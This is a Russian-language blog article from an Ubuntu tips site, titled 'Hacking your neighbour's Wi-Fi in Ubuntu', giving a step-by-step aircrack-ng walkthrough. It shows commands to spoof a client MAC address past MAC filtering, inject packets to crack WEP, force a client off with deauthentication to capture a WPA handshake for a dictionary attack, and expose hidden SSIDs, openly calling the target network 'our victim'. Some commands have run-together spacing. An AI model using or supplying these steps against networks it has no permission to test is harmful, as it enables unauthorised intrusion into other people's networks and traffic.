UBUNTU - ЧИСТКА UBUNTU - UBUNTU-LINUX-WI FI - КАК УСТАНОВИТЬ WINDOWS

Меню сайта

Форма входа

Старая форма входа

Категории раздела

Skype в Ubuntu [1]

Установка в Ubuntu XBMC Media Center [1]

базовые «горячие клавиши» в ubuntu 10.04 [1]

Пропали панели ubuntu 11.04 [1]

закрыть свой компьютер на USB Flash Ubuntu 11.04 [4]

Главная » Статьи » Ubuntu » закрыть свой компьютер на USB Flash Ubuntu 11.04

Ломаем Wi-Fi соседа в Ubuntu

Ломаем Wi-Fi соседа в Ubuntu

Вардрайвинг (англ. Wardriving) — процесс поиска и взлома уязвимых точек доступа беспроводных сетей Wi-Fi человеком либо группой лиц, оснащенных переносным компьютером с Wi-Fi-адаптером. При этом для пространственного поиска и локализации точки используется транспортное средство (отсюда и название — боевое вождение). Подробнее…
Вардрайвинг

Вардрайвинг

Для данных целей имеем:

    * Ноутбук Asus EeePC 1005P c Ubuntu 10.04 на борту
    * Wi-Fi точку (наша жертва)
    * Wi-Fi клиента у Wi-Fi точке
    * Руки, желательно две

Готовимся.

Ставим пакет aircrack-ng и macchanger



sudoapt-getinstall aircrack-ng macchanger

Теория. Точки бывают открытые или закрытые. Открытые собственно нечего ломать, берем и заходим.

Единственное что может помешать так это фильтрация по mac адресам. Обойти ее можно так:



sudo airodump-ng wlan0

Смотрим за точкой и ее клиентами. Если нет клиентов, то ждем их. Запоминаем mac адрес клиента и:



sudoifconfig wlan0 down
sudo macchanger wlan0 --mac=00:11:22:33:44:55
sudoifconfig wlan0 up

тут 00:11:22:33:44:55 это mac адрес клиента Wi-Fi точки (нашей жертвы). Ну и все подключаемся к точке.

Далее точка у нас закрытая с шифрованием WEP.
Get the Flash Player to see this content.

Пояснение. Сначало мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid



sudo airodump-ng wlan0

Узнаем свой MAC адрес



ifconfig wlan0

Имеем

    * Мой MAC адрес: 1C:4B:D6:B8:23:E5
    * MAC адрес точки доступа: 00:14:D1:4B:06:7E
    * SSID точки доступа: ClonNET
    * Канал точки доступа: 6

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга.



sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0 6

Вот на этом шаге можно сменить свой MAC адрес. Вот только менять его нужно по отношению к mon0 интерфейсу, который

появился в результате перевода airmon-ng wlan0 интерфейса в режим мониторинга. Делается это аналогично тому как описано в

случае с открытой точкой доступа.

Ловим пакеты от нашей точки.

1



sudo airodump-ng mon0 -w wep -c6--bssid 00:14:d1:4b:06:7e

Тут mon0 – интерфейс созданный airmon-ng, 6 – канал точки доступа, 00:14:d1:4b:06:7e – ее мак адрес.

wep – имя файлов с данными. Можно принципе ждать, но лучше ускорится =) В новой консоли делаем следующее:



sudo aireplay-ng -10-e ClonNET -a 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0
sudo aireplay-ng -2-p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:D1:4B:06:7E
-h 1C:4B:D6:B8:23:E5 mon0

Тут ClonNET – ssid точки доступа, 00:14:D1:4B:06:7E – ее

MAC адрес, 1C:4B:D6:B8:23:E5 – наш MAC адрес, mon0 – наш интерфейс.

Пакеты заметно полились быстрее в первой консоли с airodump-ng. Теперь можно ломать.



aircrack-ng -P1 wep*.cap

Тут wep*.cap – имя файлов что указано было выше. Процесс подумает, посчитает и выдаст нам ключ к сети, если не

выдаст то скажет сколько еще пакетов нам с Вами собрать.

Далее точка у нас закрытая с шифрованием WPA.
Get the Flash Player to see this content.

Пояснение. Сначало мы смотрим что за точка, ее mac адрес, канал на котором она работает, а также клиентов данной точки.

Дело в том, что при взламывании WPA handshake (пакет авторизации) получить можно только в процессе авторизации клиента.

По этой причине нам нужен клиент который работает с точкой доступа и заставить его переавторизоваться.



sudo airodump-ng wlan0

Узнаем свой MAC адрес



ifconfig wlan0

Имеем

    * Мой MAC адрес: 1C:4B:D6:B8:23:E5
    * MAC адрес точки доступа: 00:14:D1:4B:06:7E
    * Канал точки доступа: 6
    * Клиент точки доступа: 00:25:D3:24:B5:DF

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга. Да канал можно не указывать, как это я

делал в первый раз.



sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0

Вот на этом шаге можно сменить свой MAC адрес. Читай выше я писал как это.

Ловим пакеты от нашей точки.



sudo airodump-ng -c6-w cap mon0

Тут немного я упростил. Так как у меня всего одна точка была в зоне видимости, то я писал в файл cap все пакеты с 6 канала со всех точек (в моем случае она одна была). Если точек больше смотри по аналогии с wep шифрованием. В другой консоли делаем следующее:



sudo aireplay-ng --deauth 5-a 00:14:d1:4b:06:7e
-c 00:25:D3:24:B5:DF mon0

Так мы заставили клиента с MAC адресом 00:25:D3:24:B5:DF переавторизоваться тем самым в первой консоли сверху появится

надпись handshake – т.е. мы поймали пакет авторизации. Ломаем.



aircrack-ng -w pass.txt cap-01.cap

А теперь суть. WPA ломать простым перебором плохая идея. На это уйдут годы. По этой причине перебор организуем по словарю.

В данном примере словарь pass.txt. Вообще словари Вы можете найти тут.

Некоторая неприятность – Hidden SSID. Это когда в airodump-ng вместо SSID точки доступы вы видите <length:?> где вместо ?

стоит число (это число длина SSID). В этом случае для определения SSID нам нужно либо дождаться клиента к точке доступа,

тогда airodump-ng сам определит ее имя, либо вытолкнуть подключенного клиента к примеру вот так:



sudo aireplay-ng --deauth5-a 00:14:d1:4b:06:7e
-c 00:25:D3:24:B5:DF mon0

Тут 00:25:D3:24:B5:DF – MAC клиента, 00:14:d1:4b:06:7e – MAC точки доступа. Собственно все. Благодаря этому

инструментарию в принципе можно сломать любую Wi-Fi точку доступа.

Категория: закрыть свой компьютер на USB Flash Ubuntu 11.04 | Добавил: ubuntu (09.01.2012)

Просмотров: 4120 | Рейтинг: 5.0/3

Всего комментариев: 0

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]

Архив записей

Skype в Ubuntu [1]

Установка в Ubuntu XBMC Media Center [1]

базовые «горячие клавиши» в ubuntu 10.04 [1]

Пропали панели ubuntu 11.04 [1]

закрыть свой компьютер на USB Flash Ubuntu 11.04 [4]